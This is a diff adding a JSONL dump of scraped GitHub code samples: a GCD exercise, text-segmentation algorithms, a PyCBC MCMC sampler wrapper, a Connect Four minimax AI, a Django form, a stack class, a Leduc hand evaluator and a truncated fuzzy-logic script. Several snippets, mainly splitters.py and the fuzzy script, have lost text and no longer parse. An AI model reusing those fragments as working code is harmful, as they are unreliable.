diff --git "a/4239.jsonl" "b/4239.jsonl" new file mode 100644--- /dev/null +++ "b/4239.jsonl" @@ -0,0 +1,1032 @@ +{"seq_id":"43727811358","text":"import sys\nsys.setrecursionlimit(10000)\n\ndef GCD(a,b): \n if(b==0): \n return a \n else: \n return GCD(b,a%b)\n\ndef GCD_TOTAL(args):\n total = 0\n while(1):\n if len(args) > 1:\n a = args[0]\n args.pop(0)\n for arg in args:\n total += GCD(a,arg)\n else:\n break\n print(total)\n\nif __name__ == \"__main__\":\n T = int(input())\n for i in range(T):\n GCD_TOTAL(list(map(int , input().split()))[1:])\n ","repo_name":"ggm1207/Algorithms","sub_path":"1.baekjoon/B (31 ~ 60)/S_9613_37%.py","file_name":"S_9613_37%.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40359382598","text":"\"\"\"\nCollect the various splitting strategies in one place\n\"\"\"\n\nimport numpy as np\nfrom scipy.ndimage import generic_filter\nfrom scipy.spatial.distance import cdist\nfrom numpy.random import rand\nimport tools\n\n\n####################\n# C99\n####################\n\ndef rankkern(x):\n \"\"\" The kernel for the rank transformation, measures the fraction of the neighbors that\n take on a value less than the middle value \"\"\"\n n = x.size\n mid = n//2\n better = ( (x >= 0) & (x=0).sum() - 1.0)\n\ndef rankify(mat, size=11):\n \"\"\" Apply the ranking transformation of a given size \"\"\"\n return generic_filter(mat, rankkern, size=(size,size), mode='constant', cval=-1)\n\ndef c99score(distsmat, hyp, minlength=1, maxlength=None):\n \"\"\" Do the choi c99 scoring for a hypothesis splitting \"\"\"\n N = distsmat.shape[0]\n beta = 0.0\n alpha = 0.0\n for (a,b) in tools.seg_iter(hyp):\n beta += distsmat[a:b,a:b].sum()\n alpha += (b-a)**2\n if minlength:\n if (b-a) < minlength: beta += -np.inf\n if maxlength:\n if (b-a) > maxlength: beta += -np.inf\n return -beta/(alpha+0.)\n\ndef c99split(distsmat, k, rank=0, *args, **kwargs):\n \"\"\" Do the Choi style c99 splitting, given a matrix of distances D,\n and k splits to perform. The rank keyword denotes whether we want to \n do the ranking transformation if positive and if so denotes the size of the\n ranking filter \"\"\"\n\n # perform ranking if desired\n if rank:\n distsmat = rankify(distsmat, rank)\n\n N = distsmat.shape[0]\n score = np.inf\n splits = [N]\n n = 0\n while n < k:\n newans = min( \n ( c99score( distsmat, sorted(splits+[i]), *args, **kwargs ), splits+[i] ) \n for i in xrange(1,N-1) if i not in set(splits) )\n n += 1\n splits = newans[1]\n score = newans[0]\n return sorted(splits), score\n\n \n####################\n# DP\n####################\n\n# The dynamic programming splitter\n\ndef gensig_euclidean(X,minlength=1,maxlength=None):\n \"\"\" Generate the sigma for the squared difference from the mean \"\"\"\n cs = X.cumsum(0)\n css = (X**2).sum(1).cumsum(0) \n def sigma(i,j): \n length = j-i\n if minlength:\n if length < minlength: return np.inf\n if maxlength:\n if length > maxlength: return np.inf\n if i == 0:\n return css[j-1] - 1./j * ((cs[j-1])**2).sum() \n else: \n return ( css[j-1]-css[i-1] ) - 1./(j-i) * ((cs[j-1] - cs[i-1])**2).sum() \n return sigma\n\n\ndef gensig_cosine(X, minlength=1, maxlength=None):\n \"\"\" Generate the sigma for the cosine similarity \"\"\"\n def sigma(a,b):\n length = (b-a)\n if minlength:\n if length < minlength: return np.inf\n if maxlength:\n if length > maxlength: return np.inf\n rep = X[a:b].mean(0)\n if length < 2:\n return np.inf\n return (cdist( X[a:b], [ rep ], 'cosine')**2).sum()\n return sigma\n\n\ndef gensig_model_old(X, minlength=1, maxlength=None, lam=0.0):\n N,D = X.shape\n over_sqrtD = 1./np.sqrt(D)\n def sigma(a,b):\n length = (b-a)\n if minlength:\n if length < minlength: return np.inf\n if maxlength:\n if length > maxlength: return np.inf\n rep = (2*(X[a:b].sum(0)>0)-1)*over_sqrtD\n return -X[a:b].dot(rep).sum() \n # return -X[a:b].dot(rep).sum() + lam*np.sqrt(length)/np.log(N)\n return sigma\n\ndef gensig_model(X, minlength=1, maxlength=None, lam=0.0):\n N,D = X.shape\n over_sqrtD = 1./np.sqrt(D)\n cs = np.cumsum(X,0)\n\n def sigma(a,b):\n length = (b-a)\n if minlength:\n if length < minlength: return np.inf\n if maxlength:\n if length > maxlength: return np.inf\n\n tot = cs[b-1].copy()\n if a > 0:\n tot -= cs[a-1]\n signs = np.sign(tot)\n return -over_sqrtD*(signs*tot).sum()\n return sigma\n\n\ndef tiebreak():\n return 1e-10*rand()\n\ndef gensig_choi(distsmat, minlength=1, maxlength=None, rank=0):\n \"\"\" The two dimensional sigma function for the c99 splitting \"\"\"\n if rank:\n distsmat = rankify(distsmat, rank)\n def sigma(a,b):\n length = (b-a)\n beta = distsmat[a:b,a:b].sum()\n alpha = (b-a)**2\n if minlength:\n if (b-a) < minlength: beta += np.inf\n if maxlength:\n if (b-a) > maxlength: beta += np.inf\n return (-beta, alpha)\n return sigma\n\ndef dpsplit(n,k, sig):\n \"\"\" Perform the dynamic programming optimal segmentation, using the sig function\n to determine the cost of a segment sig(i,j) is the cost of the i,j segment. These\n are then added together\n \"\"\"\n\n # Set up the tracking tables\n K = k + 1\n N = n\n segtable = np.zeros((n,K)) + np.nan\n segtable[:,0] = [ sig(0,j+1) for j in xrange(N) ]\n segindtable = np.zeros((N,K), dtype='int') - 1\n\n # fill up the table in a clever order\n for k in xrange(1,K):\n for j in xrange(k,N):\n #fill the j,k element\n ans = min( ( (segtable[l,k-1] + sig(l+1,j+1), l+1 )\n for l in xrange(k-1,j) ) )\n segtable[j,k] = ans[0]\n segindtable[j,k] = ans[1]\n\n # read out the path\n current_pointer = segindtable[-1,K-1]\n path = [current_pointer]\n for k in xrange(K-2, 0, -1):\n current_pointer = segindtable[current_pointer-1, k]\n path.append(current_pointer)\n\n return sorted(path + [N]), segtable[-1,K-1]\n\ndef dpsplit_general(n,k, sig, combine=lambda a,b: a+b, key=lambda a: a, d=1):\n \"\"\" Perform the dynamic programming optimal segmentation, using the sig function\n to determine the cost of a segment sig(i,j) is the cost of the i,j segment. These\n are then added together using the combine function and reduced to a scalar cost with the \n key function. d sets the dimensionality of the intermediary representation\n \"\"\"\n\n # Set up the tracking tables\n K = k + 1\n N = n\n if d > 1:\n segtable = np.zeros((n,K,d)) + np.nan\n else:\n segtable = np.zeros((n,K)) + np.nan\n segtable[:,0] = [ sig(0,j+1) for j in xrange(N) ]\n segindtable = np.zeros((N,K), dtype='int') - 1\n\n # fill up the table in a clever order\n for k in xrange(1,K):\n for j in xrange(k,N):\n #fill the j,k element\n ans = min( ( ( combine(segtable[l,k-1],sig(l+1,j+1)), l+1 )\n for l in xrange(k-1,j) ), key=lambda x: key(x[0]) )\n segtable[j,k] = ans[0]\n segindtable[j,k] = ans[1]\n\n # read out the path\n current_pointer = segindtable[-1,K-1]\n path = [current_pointer]\n for k in xrange(K-2, 0, -1):\n current_pointer = segindtable[current_pointer-1, k]\n path.append(current_pointer)\n\n return sorted(path + [N]), key(segtable[-1,K-1])\n\n\n####################\n# Greedy\n####################\n\n\ndef greedysplit(n, k, sigma):\n \"\"\" Do a greedy split \"\"\"\n splits = [n]\n s = sigma(0,n)\n\n def score(splits, sigma):\n splits = sorted(splits)\n return sum( sigma(a,b) for (a,b) in tools.seg_iter(splits) )\n\n while k > 0:\n usedinds = set(splits)\n new = min( ( score( splits + [i], sigma), splits + [i] )\n for i in xrange(1,n) if i not in usedinds )\n splits = new[1]\n s = new[0]\n k -= 1\n return sorted(splits), s\n\ndef greedysplit_general(n, k, sigma, combine=lambda a,b: a+b, key=lambda a: a):\n \"\"\" Do a greedy split \"\"\"\n splits = [n]\n s = sigma(0,n)\n\n def score(splits, sigma):\n splits = sorted(splits)\n return key( reduce( combine, (sigma(a,b) for (a,b) in tools.seg_iter(splits) ) ))\n\n while k > 0:\n usedinds = set(splits)\n new = min( ( score( splits + [i], sigma), splits + [i] )\n for i in xrange(1,n) if i not in usedinds )\n splits = new[1]\n s = new[0]\n k -= 1\n return sorted(splits), s\n\ndef bestsplit(low, high, sigma, minlength=1, maxlength=None):\n \"\"\" Find the best split inside of a region \"\"\"\n length = high-low\n if length < 2*minlength:\n return (np.inf, np.inf, low)\n best = min( ((sigma(low,j), sigma(j, high), j) for j in xrange(low+1,high)), key=lambda x: x[0]+x[1] )\n return best\n\n\ndef greedysplit_old(n, k, sigma):\n \"\"\" Do a greedy split \"\"\"\n k = k + 1\n splits = [0,n]\n costs = [sigma(0,n)]\n cost = costs[0]\n # path = []\n\n while k > 0:\n bestcosts = []\n bsp = []\n bestcost = np.inf\n for j in xrange(len(splits)-1):\n left, right, sp = bestsplit(splits[j], splits[j+1], sigma)\n newcost = left+right + sum(costs[:j]) + sum(costs[j+1:])\n if newcost < bestcost:\n bestcost = newcost\n bsp = splits[:j+1] + [sp] + splits[j+1:]\n bestcosts = costs[:j] + [left,right] + costs[j:]\n costs = bestcosts\n cost = bestcost\n splits = bsp\n # path.append( (splits, cost, k*(d+1)*np.log(d*top) ) )\n k -= 1\n\n return splits[1:], cost\n\n\ndef refine(splits, sigma, n=1):\n \"\"\" Given some splits, refine them a step \"\"\"\n oldsplits = splits[:]\n counter = 0\n n = n or np.inf\n\n while counter < n:\n splits = [0]+splits\n n = len(splits) - 2\n new = [splits[0]]\n for i in xrange(n):\n out = bestsplit(splits[i], splits[i+2], sigma)\n new.append(out[2])\n new.append(splits[-1])\n splits = new[1:]\n\n if splits == oldsplits:\n break\n oldsplits = splits[:]\n counter += 1\n\n return splits\n\ndef bestsplit_general(splits, pk, sigma, combine=lambda a,b: a+b, key=lambda a: a):\n \"\"\" Move the pk-th split to its best location \"\"\"\n def score(splits, sigma):\n splits = sorted(splits)\n return key( reduce( combine, (sigma(a,b) for (a,b) in tools.seg_iter(splits) ) ))\n\n if pk == 0:\n left = 0\n else:\n left = splits[pk-1]\n right = splits[pk+1]\n\n best = min( (score( splits[:pk] + [j] + splits[pk+1:], sigma),j) for j in xrange(left+1,right) )\n return best[1]\n\ndef refine_general(splits, sigma, n=1, combine=lambda a,b: a+b, key=lambda a: a):\n \"\"\" Do a general refinement of up to n steps \"\"\"\n oldsplits = splits[:]\n N = splits[-1]\n counter = 0\n k = len(splits)\n n = n or np.inf\n\n while counter < n:\n splits = [ bestsplit_general(splits, i, sigma, combine, key) for i in xrange(k-1) ] + [N]\n\n if splits == oldsplits:\n break\n oldsplits = splits[:]\n counter += 1\n\n return splits\n\n","repo_name":"alexalemi/segmentation","sub_path":"code/splitters.py","file_name":"splitters.py","file_ext":"py","file_size_in_byte":10643,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"95"} +{"seq_id":"20644402118","text":"from __future__ import absolute_import\n\nimport numpy\nimport emcee\nimport h5py\nimport logging\nfrom pycbc.pool import choose_pool\n\nfrom .base import BaseSampler\nfrom .base_mcmc import (BaseMCMC, raw_samples_to_dict,\n get_optional_arg_from_config)\nfrom .base_multitemper import (MultiTemperedSupport,\n MultiTemperedAutocorrSupport)\nfrom ..burn_in import MultiTemperedMCMCBurnInTests\nfrom pycbc.inference.io import EmceePTFile\nfrom .. import models\n\n\nclass EmceePTSampler(MultiTemperedAutocorrSupport, MultiTemperedSupport,\n BaseMCMC, BaseSampler):\n \"\"\"This class is used to construct a parallel-tempered MCMC sampler from\n the emcee package's PTSampler.\n\n Parameters\n ----------\n model : model\n A model from ``pycbc.inference.models``.\n ntemps : int\n Number of temeratures to use in the sampler.\n nwalkers : int\n Number of walkers to use in sampler.\n betas : array\n An array of inverse temperature values to be used in emcee_pt's\n temperature ladder. If not provided, emcee_pt will use the number of\n temperatures and the number of dimensions of the parameter space to\n construct the ladder with geometrically spaced temperatures.\n pool : function with map, Optional\n A provider of a map function that allows a function call to be run\n over multiple sets of arguments and possibly maps them to\n cores/nodes/etc.\n \"\"\"\n name = \"emcee_pt\"\n _io = EmceePTFile\n burn_in_class = MultiTemperedMCMCBurnInTests\n\n def __init__(self, model, ntemps, nwalkers, betas=None,\n checkpoint_interval=None, checkpoint_signal=None,\n loglikelihood_function=None,\n nprocesses=1, use_mpi=False):\n\n self.model = model\n\n # create a wrapper for calling the model\n if loglikelihood_function is None:\n loglikelihood_function = 'loglikelihood'\n # frustratingly, emcee_pt does not support blob data, so we have to\n # turn it off\n model_call = models.CallModel(model, loglikelihood_function,\n return_all_stats=False)\n\n # Set up the pool\n if nprocesses > 1:\n # these are used to help paralleize over multiple cores / MPI\n models._global_instance = model_call\n model_call = models._call_global_model\n prior_call = models._call_global_model_logprior\n else:\n prior_call = models.CallModel(model, 'logprior',\n return_all_stats=False)\n pool = choose_pool(mpi=use_mpi, processes=nprocesses)\n if pool is not None:\n pool.count = nprocesses\n\n # construct the sampler: PTSampler needs the likelihood and prior\n # functions separately\n ndim = len(model.variable_params)\n self._sampler = emcee.PTSampler(ntemps, nwalkers, ndim,\n model_call, prior_call, pool=pool,\n betas=betas)\n self._nwalkers = nwalkers\n self._ntemps = ntemps\n self._checkpoint_interval = checkpoint_interval\n self._checkpoint_signal = checkpoint_signal\n\n @property\n def io(self):\n return self._io\n\n @property\n def base_shape(self):\n return (self.ntemps, self.nwalkers,)\n\n @property\n def betas(self):\n return self._sampler.betas\n\n @classmethod\n def from_config(cls, cp, model, nprocesses=1, use_mpi=False):\n \"\"\"\n Loads the sampler from the given config file.\n\n For generating the temperature ladder to be used by emcee_pt, either\n the number of temperatures (provided by the option 'ntemps'),\n or the path to a file storing inverse temperature values (provided\n under a subsection inverse-temperatures-file) can be loaded from the\n config file. If the latter, the file should be of hdf format, having\n an attribute named 'betas' storing the list of inverse temperature\n values to be provided to emcee_pt. If the former, emcee_pt will\n construct the ladder with \"ntemps\" geometrically spaced temperatures.\n \"\"\"\n section = \"sampler\"\n # check name\n assert cp.get(section, \"name\") == cls.name, (\n \"name in section [sampler] must match mine\")\n # get the number of walkers to use\n nwalkers = int(cp.get(section, \"nwalkers\"))\n if cp.has_option(section, \"ntemps\") and \\\n cp.has_option(section, \"inverse-temperatures-file\"):\n raise ValueError(\"Must specify either ntemps or \"\n \"inverse-temperatures-file, not both.\")\n if cp.has_option(section, \"inverse-temperatures-file\"):\n # get the path of the file containing inverse temperatures values.\n inverse_temperatures_file = cp.get(section,\n \"inverse-temperatures-file\")\n with h5py.File(inverse_temperatures_file, \"r\") as fp:\n try:\n betas = numpy.array(fp.attrs['betas'])\n ntemps = betas.shape[0]\n except KeyError:\n raise AttributeError(\"No attribute called betas\")\n else:\n # get the number of temperatures\n betas = None\n ntemps = int(cp.get(section, \"ntemps\"))\n # get the checkpoint interval, if it's specified\n checkpoint_interval = cls.checkpoint_from_config(cp, section)\n checkpoint_signal = cls.ckpt_signal_from_config(cp, section)\n # get the loglikelihood function\n logl = get_optional_arg_from_config(cp, section, 'logl-function')\n obj = cls(model, ntemps, nwalkers, betas=betas,\n checkpoint_interval=checkpoint_interval,\n checkpoint_signal=checkpoint_signal,\n loglikelihood_function=logl, nprocesses=nprocesses,\n use_mpi=use_mpi)\n # set target\n obj.set_target_from_config(cp, section)\n # add burn-in if it's specified\n obj.set_burn_in_from_config(cp)\n # set prethin options\n obj.set_thin_interval_from_config(cp, section)\n return obj\n\n @property\n def samples(self):\n \"\"\"A dict mapping ``variable_params`` to arrays of samples currently\n in memory.\n\n The arrays have shape ``ntemps x nwalkers x niterations``.\n \"\"\"\n # emcee stores samples to it's chain attribute as a\n # nwalker x niterations x ndim array\n raw_samples = self._sampler.chain\n return raw_samples_to_dict(self, raw_samples)\n\n @property\n def model_stats(self):\n \"\"\"Returns the log likelihood ratio and log prior as a dict of arrays.\n\n The returned array has shape ntemps x nwalkers x niterations.\n\n Unfortunately, because ``emcee_pt`` does not have blob support, this\n will only return the loglikelihood and logprior (with the logjacobian\n set to zero) regardless of what stats the model can return.\n\n\n .. warning::\n Since the `logjacobian` is not saved by `emcee_pt`, the `logprior`\n returned here is the log of the prior pdf in the sampling\n coordinate frame rather than the variable params frame. This\n differs from the variable params frame by the log of the Jacobian\n of the transform from one frame to the other. If no sampling\n transforms were used, then the `logprior` is the same.\n \"\"\"\n # likelihood has shape ntemps x nwalkers x niterations\n logl = self._sampler.lnlikelihood\n # get prior from posterior\n logp = self._sampler.lnprobability - logl\n logjacobian = numpy.zeros(logp.shape)\n return {'loglikelihood': logl, 'logprior': logp,\n 'logjacobian': logjacobian}\n\n def clear_samples(self):\n \"\"\"Clears the chain and blobs from memory.\n \"\"\"\n # store the iteration that the clear is occuring on\n self._lastclear = self.niterations\n self._itercounter = 0\n # now clear the chain\n self._sampler.reset()\n\n def set_state_from_file(self, filename):\n \"\"\"Sets the state of the sampler back to the instance saved in a file.\n \"\"\"\n with self.io(filename, 'r') as fp:\n rstate = fp.read_random_state()\n # set the numpy random state\n numpy.random.set_state(rstate)\n\n def run_mcmc(self, niterations):\n \"\"\"Advance the ensemble for a number of samples.\n\n Parameters\n ----------\n niterations : int\n Number of samples to get from sampler.\n \"\"\"\n pos = self._pos\n if pos is None:\n pos = self._p0\n res = self._sampler.run_mcmc(pos, niterations)\n p, _, _ = res[0], res[1], res[2]\n # update the positions\n self._pos = p\n\n def write_results(self, filename):\n \"\"\"Writes samples, model stats, acceptance fraction, and random state\n to the given file.\n\n Parameters\n -----------\n filename : str\n The file to write to. The file is opened using the ``io`` class\n in an an append state.\n \"\"\"\n with self.io(filename, 'a') as fp:\n # write samples\n fp.write_samples(self.samples, self.model.variable_params,\n last_iteration=self.niterations)\n # write stats\n fp.write_samples(self.model_stats, last_iteration=self.niterations)\n # write accpetance\n fp.write_acceptance_fraction(self._sampler.acceptance_fraction)\n # write random state\n fp.write_random_state()\n\n @classmethod\n def calculate_logevidence(cls, filename, thin_start=None, thin_end=None,\n thin_interval=None):\n \"\"\"Calculates the log evidence from the given file using ``emcee_pt``'s\n thermodynamic integration.\n\n Parameters\n ----------\n filename : str\n Name of the file to read the samples from. Should be an\n ``EmceePTFile``.\n thin_start : int\n Index of the sample to begin returning stats. Default is to read\n stats after burn in. To start from the beginning set thin_start\n to 0.\n thin_interval : int\n Interval to accept every i-th sample. Default is to use the\n `fp.acl`. If `fp.acl` is not set, then use all stats\n (set thin_interval to 1).\n thin_end : int\n Index of the last sample to read. If not given then\n `fp.niterations` is used.\n\n Returns\n -------\n lnZ : float\n The estimate of log of the evidence.\n dlnZ : float\n The error on the estimate.\n \"\"\"\n with cls._io(filename, 'r') as fp:\n logls = fp.read_raw_samples(['loglikelihood'],\n thin_start=thin_start,\n thin_interval=thin_interval,\n thin_end=thin_end,\n temps='all', flatten=False)\n logls = logls['loglikelihood']\n # we need the betas that were used\n betas = fp.betas\n # annoyingly, theromdynaimc integration in PTSampler is an instance\n # method, so we'll implement a dummy one\n ntemps = fp.ntemps\n nwalkers = fp.nwalkers\n ndim = len(fp.variable_params)\n dummy_sampler = emcee.PTSampler(ntemps, nwalkers, ndim, None,\n None, betas=betas)\n return dummy_sampler.thermodynamic_integration_log_evidence(\n logls=logls, fburnin=0.)\n\n def finalize(self):\n \"\"\"Calculates the log evidence and writes to the checkpoint file.\n\n The thin start/interval/end for calculating the log evidence are\n retrieved from the checkpoint file's thinning attributes.\n \"\"\"\n logging.info(\"Calculating log evidence\")\n # get the thinning settings\n with self.io(self.checkpoint_file, 'r') as fp:\n thin_start = fp.thin_start\n thin_interval = fp.thin_interval\n thin_end = fp.thin_end\n # calculate\n logz, dlogz = self.calculate_logevidence(\n self.checkpoint_file, thin_start=thin_start, thin_end=thin_end,\n thin_interval=thin_interval)\n logging.info(\"log Z, dlog Z: {}, {}\".format(logz, dlogz))\n # write to both the checkpoint and backup\n for fn in [self.checkpoint_file, self.backup_file]:\n with self.io(fn, \"a\") as fp:\n fp.write_logevidence(logz, dlogz)\n","repo_name":"Yuzhe98/Yu0702","sub_path":"venv/Lib/site-packages/pycbc-master/pycbc/inference/sampler/emcee_pt.py","file_name":"emcee_pt.py","file_ext":"py","file_size_in_byte":12830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27749969861","text":"import copy\nfrom board import Board\n\nclass AI:\n def minimax(self, board, depth, bestVal, minVal, isMaxiPlayer):\n val = 0\n r = 0\n column = 0\n validLocations = board.getValidLocations()\n is_gameTerminal = board.gameFinished()\n if depth == 0 or is_gameTerminal:\n if is_gameTerminal:\n if board.ai_check_win():\n if board.turn is board.turn:\n return (None, 1000)\n elif board.turn is not board.turn:\n return (None, -1000)\n else:\n return (None, 0)\n else:\n return (None, board.score_position(board))\n # print(validLocations)\n if isMaxiPlayer:\n # print(\"Entering Maxi Player Loop\")\n highestVal = -1000\n # print(\"7th Col State: \" + str(board.grid[0][6].state))\n for col in validLocations:\n r = board.obtainNextAvailRow(col)\n selfCopy = copy.copy(board)\n # print(\"Col: \" + str(col))\n selfCopy.grid[r][col].state = board.turn\n value = self.minimax(selfCopy, (depth - 1), bestVal, minVal, False)[1]\n\n board.grid[r][col].state = \"black\"\n if value > highestVal:\n highestVal = value\n column = col\n # print(\"highestVal: \" + str(highestVal))\n # print(\"col: \" + str(col))\n bestVal = max(bestVal, highestVal)\n if bestVal >= minVal:\n break\n # print(\"Minimax Column: \" + str(column))\n return column, highestVal\n\n\n else:\n\n print(\"Entering Mini Player Lopp\")\n highestVal = 1000\n # for i in range(7):\n # print(\"Available Spot: [\" + str(minValueRow[i]) + \",\" + str(minValueCol[i]) + \"]\")\n\n for col in validLocations:\n r = board.obtainNextAvailRow(col)\n selfCopy = copy.copy(board)\n selfCopy.grid[r][col].state = board.turn\n # print(\"Turn: \" + str(board.turn))\n value = self.minimax(selfCopy, (depth - 1), bestVal, minVal, True)[1]\n if value < highestVal:\n highestVal = value\n column = col\n minVal = min(highestVal, minVal)\n if bestVal >= minVal:\n break\n board.grid[r][col].state = \"black\"\n return column, highestVal","repo_name":"nathrichCSUF/Connect4AI","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"24216154526","text":"from django.forms import ModelForm,HiddenInput\n\nfrom .models import Command\n\nclass DefineCommandForm(ModelForm):\n class Meta:\n model = Command\n fields = '__all__'\n exclude = ['owner']\n widgets = {\n 'owner':HiddenInput(),\n 'cmd_date':HiddenInput(),\n 'is_published':HiddenInput(),\n }","repo_name":"GoldenbyteTeam/GB_PROJECT","sub_path":"clicommands/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40166038854","text":"\nclass Stack:\n def __init__(self):\n self.stack = []\n \n def push(self, item):\n self.stack.append(item)\n \n def pop(self):\n if not self.is_empty():\n return self.stack.pop()\n else:\n return \"Stack is empty\"\n \n def top(self):\n if not self.is_empty():\n return self.stack[-1]\n else:\n return \"Stack is empty\"\n \n def is_empty(self):\n return len(self.stack) == 0\n \n def display(self):\n if not self.is_empty():\n print(\"Stack:\", self.stack)\n else:\n print(\"Stack is empty\")\n\n# Creating a stack and filling it with user-defined elements\nstack = Stack()\n\nprint(\"Step 1: Create and fill the stack with user-defined elements\")\n\nfor i in range(6):\n element = input(f\"Enter element {i+1}: \")\n stack.push(element)\n\n# Displaying the stack\nstack.display()\n\n# Removing first 3 elements from the stack using pop\nprint(\"\\nRemoving first 3 elements from the stack\")\nfor _ in range(3):\n stack.pop()\n\n# Displaying the edited stack\nstack.display()\n\n# Checking the element at the top of the stack using top method\nprint(\"\\nElement at the top of the stack:\", stack.top())\n\n# Checking if the stack is empty using is_empty method\nprint(\"Is the stack empty?\", stack.is_empty())\n\n# Removing all elements from the stack using a while loop\nprint(\"\\nRemoving all elements from the stack:\")\nwhile not stack.is_empty():\n print(\"Element at the top of the stack:\", stack.top())\n stack.pop()\n\n# Repeating Step 1: Create and fill the stack with user-defined elements\nprint(\"\\nRepeating Step 1: Create and fill the stack with user-defined elements\")\nfor i in range(6):\n element = input(f\"Enter element {i+1}: \")\n stack.push(element)\n\n# Displaying the stack after repeating Step 1\nstack.display()\n\n","repo_name":"syedanasali09/DSA-with-Python","sub_path":"Lab-OHT/Question-3.py","file_name":"Question-3.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11659067822","text":"import numpy as np\n\nfrom card_tools import card_tools\nfrom GameSettings import game_settings\n\n\n# Gives strength representations for all private hands on the given board.\n# @param board a possibly empty vector of board cards\n# @param impossible_hand_value the value to assign to hands which are invalid\n# on the board\n# @return a vector containing a strength value or `impossible_hand_value` for\n# every private hand\ndef batch_eval(board, impossible_hand_value):\n hand_values = np.full(game_settings.card_count, -1, dtype=float)\n\n if board.shape[0] == 0:\n for hand in range(1, game_settings.card_count + 1):\n hand_values[hand - 1] = int((hand - 1) / game_settings.suit_count) + 1\n else:\n board_size = board.shape[0]\n assert board_size == 1 or board_size == 2, \"Incorrect board size for Leduc\"\n whole_hand = np.zeros(board_size + 1, dtype=int)\n whole_hand[:-1] = board\n\n for card in range(1, game_settings.card_count + 1):\n whole_hand[-1] = card\n hand_values[card - 1] = evaluate(whole_hand, impossible_hand_value)\n\n return hand_values\n\n\n# Gives a strength representation for a two or three card hand.\n# @param hand a vector of two or three cards\n# @param[opt] impossible_hand_value the value to return if the hand is invalid\n# @return the strength value of the hand, or `impossible_hand_value` if the\n# hand is invalid\ndef evaluate(whole_hand, impossible_hand_value=None):\n assert (\n np.max(whole_hand) <= game_settings[\"card_count\"] and np.min(whole_hand) > 0\n ), \"hand does not correspond to any cards\"\n impossible_hand_value = (\n impossible_hand_value if impossible_hand_value is not None else -1\n )\n\n if not card_tools.hand_is_possible(whole_hand):\n return impossible_hand_value\n\n # We are not interested in the hand suit; we will use ranks instead of cards\n hand_ranks = np.copy(whole_hand)\n for i in range(hand_ranks.size):\n hand_ranks[i] = card_to_string.card_to_rank(hand_ranks[i])\n\n hand_ranks.sort()\n\n if whole_hand.size == 2:\n return evaluate_two_card_hand(hand_ranks)\n elif whole_hand.size == 3:\n return evaluate_three_card_hand(hand_ranks)\n else:\n assert False, \"unsupported size of hand!\"\n","repo_name":"haochenuw/pydeepstack","sub_path":"Evaluator.py","file_name":"Evaluator.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2411566105","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\nclass fuzzy():\r\n\tXmin=2100 #permintaan minimal\r\n\tXmax=3500 #permintaan maxsimal\r\n\tYmin=100 #persediaan minimal\r\n\tYmax=250\r\n\tZmin=1000\r\n\tZmax=5000\r\n\tpermNaik=0\r\n\tpremTurun=0\r\n\tpsdSedikit=0\r\n\tpsdBanyak=0\r\n\tx=0 #permintaan\r\n\ty=0 #persediaan\r\n\talpa=[0]*4\r\n\tz=[0]*4\r\n\r\ndef __init__(self,permintaan,persediaan):\r\n\tself.x=permintaan\r\n\tself.y=persediaan\r\n\tself.fpermTurun()\r\n\tself.fpermNaik()\r\n\tself.psdSedikit()\r\n\tself.psdBanyak()\r\n\tself.rule()\r\n#self.defuzifikasi()\r\n\r\ndef fpermTurun(self):\r\n\tif self.x < self.Xmin:\r\n\t\tself.permTurun=1\r\n\telif self.x>=self.Xmin and self.x<=self.Xmax:\r\n\t\tself.permTurun=(self.Xmax-self.x)/(self.Xmax-self.Xmin)\r\n\telse:\r\n\t\tself.permTurun=0\r\n\r\ndef fpermNaik(self):\r\n\tif self.x < self.Xmin:\r\n\t\tself.permNaik=0\r\n\telif self.x>=self.Xmin and self.x<=self.Xmax:\r\n\t\tself.permNaik=(self.x-self.Xmin)/(self.Xmax-self.Xmin)\r\n\telse:\r\n\t\tself.permNaik=1\r\n\r\ndef fpsdSedikit(self):\r\n\tif self.y=self.Ymin and self.y<=self.Ymax:\r\n\t\tself.psdSedikit=(self.Ymax-self.y)/(self.Ymax-self.Ymin)\r\n\telse:\r\n\t\tself.psdSedikit=0\r\n\r\ndef fpsdBanyak(self):\r\n\tif self.y=self.Ymin and self.y<=self.Ymax:\r\n\t\tself.psdBanyak=(self.y-self.Ymin)/(self.Ymax-self.Ymin)\r\n\telse:\r\n\t\tself.psdBanyak=1\r\n\r\ndef rule(self):\r\n\t#rule 1: jika perm turun dan psd banyak maka produksi berkurang\r\n\tself.alpa[0]=min(self.permTurun,self.psdBanyak)\r\n\tself.z[0]=self.Zmax-self.alpa[0]*(self.Zmax-self.Zmin)\r\n\r\n\t#rule 2: Jika perm turun dan pesediaan sedikit maka produksi berkurang\r\n\tself.alpa[1]=min(self.permTurun,self.psdSedikit)\r\n\tself.z[1]=self.Zmax-self.alpa[1]*(self.Zmax-self.Zmin)\r\n\r\n\t#rule 3: Jika perm Naik, Persediaan Banyak maka Produksi bertambah\r\n\tself.alpa[2]=min(self.permNaik,self.psdBanyak)\r\n\tself.z[2]=self.alpa[2]*(self.Zmax-self.Zmin)+self.Zmin\r\n\r\n\t#rule 4: Jika perm Naik, Persediaan Sedikit,Maka produksi bertambah\r\n\tself.alpa[3]=min(self.permNaik,self.psdSedikit)\r\n\tself.z[3]=self.alpa[3]*(self.Zmax-self.Zmin)+self.Zmin\r\n\r\ndef 